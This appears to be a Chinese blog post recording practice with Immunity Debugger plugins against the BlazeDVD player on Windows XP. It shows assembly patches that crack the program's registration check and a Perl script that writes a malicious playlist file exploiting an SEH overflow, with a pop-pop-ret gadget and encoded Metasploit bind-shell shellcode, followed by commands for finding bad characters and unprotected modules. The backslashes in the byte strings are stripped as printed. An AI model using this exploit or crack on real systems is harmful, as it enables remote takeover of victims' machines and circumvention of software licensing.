• !pvefindaddr 插件使用学习


    随便下载的  BlazeDVD 版本  来实验················

    XP SP3  无DEP 


    首先程序破解:

    很简单  直接搜搜字符串    修改几个jmp  即可成功

    6030324B   . /E9 35030000   jmp Configur.60303585
    60303250   > |68 C0003460   push Configur.603400C0                   ;  IsRegistered1
    60303255   . |57            push edi
    60303256   . |E8 15570100   call Configur.60318970
    6030325B   . |83C4 08       add esp,0x8
    6030325E   . |85C0          test eax,eax 
    60303260     |E9 93000000   jmp Configur.603032F8                  //jmp
    

    603033A1   > 68 A87A3460   push Configur.60347AA8                   ;  IsRegistered3
    603033A6   .  57            push edi
    603033A7   .  E8 C4550100   call Configur.60318970
    603033AC   .  83C4 08       add esp,0x8
    603033AF   .  85C0          test eax,eax
    603033B1      E9 94000000   jmp Configur.6030344A                  //jmp
    603033B6      90            nop
    

    6030344A   > 68 947A3460   push Configur.60347A94                   ;  IsPlaybackTimeOut
    6030344F   .  57            push edi
    60303450   .  E8 1B550100   call Configur.60318970
    60303455   .  83C4 08       add esp,0x8
    60303458   .  85C0          test eax,eax
    6030345A      EB 1B         jmp XConfigur.60303477
    
    60303477   > 57            push edi
    60303478   .  8D4E E8       lea ecx,dword ptr ds:[esi-0x18]
    6030347B   .  E8 E0280000   call Configur.60305D60
    60303480   .  8BD8          mov ebx,eax
    60303482   .  83FB FF       cmp ebx,-0x1
    60303485      EB 07         jmp XConfigur.6030348E
    60303487   .  33C0          xor eax,eax
    60303489   .  E9 F7000000   jmp Configur.60303585
    6030348E   >  68 E0773460   push Configur.603477E0                   ;  AutoResumeMode
    60303493   .  57            push edi
    


    本来是用  反弹shell 的sehllcode  但是  "x1a" 字符被检查到了  不能用·············
    PERL脚本:

    my $file = "test.plf";
    
    #0x1000ecfa pop ebx; pop ebp; ret
    #0x1000ef4a pop esi; pop ebp; ret
    #0x1000f00e pop edi; pop esi; ret
    #0x100101e7 pop esi; pop ecx; ret
    #0x1001028f pop esi; pop ebx; retn 0x0010
    #0x100104d7 pop ebx; pop ecx; retn 0x000c
    #0x10010511 pop esi; pop ebx; retn 0x000c
    #0x1001058a pop ebp; pop ebx; retn 0x0010
    #0x10010595 pop ebp; pop ebx; retn 0x0010
    #0x1001059f pop ebp; pop ebx; retn 0x0010
    #0x100105f1 pop esi; pop ebx; retn 0x000c
    my $junk = "xcc"x608;
    my $nseh = "xebx1ex90x90";
    my $seh = pack('V',0x10010511);
    my $prejunk = "x90"x30;
    # windows/shell_bind_tcp - 368 bytes  
    # http://www.metasploit.com  
    # Encoder: x86/shikata_ga_nai  
    # LPORT=4444, RHOST=x.x.x.x, EXITFUNC=seh,   
    #x1a
    my $shellcode =   
    "xD9xEE".
    "xD9x74x24xF4".
    "x58".
    "x83xC0x1b".
    "x33xC9".
    "x8Ax1Cx08" .
    "x80xF3x11".
    "x88x1Cx08".
    "x41" .
    "x80xFBx90".
    "x75xF1".
    "xedx79x7bx1bx29x0fx79x72x98xc0x5ex79x23x65x80x1d".
    "x9axe5x9cx6fxe5x22xcaxa6x15x3axf2x77xaax22x23x42".
    "x79x64x62x74x63x45x22xc3x75x9ax4bx21x9ax5ax1dx9a".
    "x58x0dx9ax18x9ax78x19xbcx2cx7bx1bx29x0fx64x14x84".
    "xeex46xe9x84x71x9ax54x2dx9ax5dx14x69x12xdcx9ax48".
    "x31x12xccx22xeex56x9ax25xaax12xe4x88x1exafx17x2b".
    "xd5x65x19xd0xdbx16x12xc1x57xfaxe0x2ax45x35x0dx64".
    "xf5x9ax48x35x12xccx77x9ax2dx6ax9ax48x0dx12xccx12".
    "x3dxaax84x4exbax46x70x2cx7bx1bx29x0fx64xb8x22xca".
    "x42x79x75x70x21x32x79x32x41x70x7fx9axd5x42x41x41".
    "x42xeex46xedx42xeex46xe9x81";
    
    
    my $payload = $junk.$nseh.$seh.$prejunk.$shellcode;
    
    open($FILE,">$file");
    print $FILE $payload;
    close($FILE);
    



    下面学习检查可能存在的  bad characters 

    !load byakugan

    !jutsu memDiff file 302 c:sploitsshell.txt 0x0012f5de

                                      shellcode长度   +  包含shellcode的文件+ 内存中 的起始地址

    粗字体为  不同的地方 

    我将上面的shellcode   "xee"   全改为了  "xcc"   检查如下:



    !load byakugan

    !jutsu identBuf file myShell c:shell.txt

    !jutsu identBuf msfpattern myBuffer 608

    !jutsu listBuf


    !searchcode jmp esp   可以显示  模块属性          DEP寻找特殊代码时要用!!!!!!!!!!!!!!!

    !aslrdynamicbase   查看随机分布的模块



    !pvefindaddr        j   jmp/call ret 组合

                jseh  用于绕过 SAFESEH 保护时特别有用

        nosafeseh  未经saffeseh保护的模块

    !packets 用于捕获无线数据包   打开网页  附加  !packet  继续运行   查看 captured Packets 窗口

    !safeseh 列出可执行模块,并提示是否受 safeseh保护  !safeseh 命令


    !mona bytearray  ······················· 可以生成 00-ff 去检测bad character


    找寻 shellcode 位置  !mona cmp -f c:1egg1.bin





























  • 相关阅读:
    0级搭建类006-Oracle Solaris 安装 (10.13) 公开
    0级搭建类005-Oracle Solaris Unix安装 (11.4) 公开
    0级搭建类004-中标麒麟 Linux 安装 (V7.0) 公开
    0级搭建类003-CentOS Linux安装 (CentOS 7)公开
    0级搭建类002-Oracle Linux 8.x安装(OEL 8.0) 公开
    0级搭建类001-RedHat Enterprise Linux 8 安装(RHEL 8) 公开
    1级搭建类105-Oracle 19c 单实例 FS(19.3+RHEL 8)公开
    1级搭建类103-Oracle 12c 单实例 FS(12.2.0.1+RHEL 7)公开
    1级搭建类102-Oracle 11g 单实例 FS(11.2.0.4+RHEL 7)公开
    1级搭建类101-Oracle 11g 单实例 FS LVM(11.2.0.4+RHEL 5)公开
  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982387.html
Copyright © 2020-2023  润新知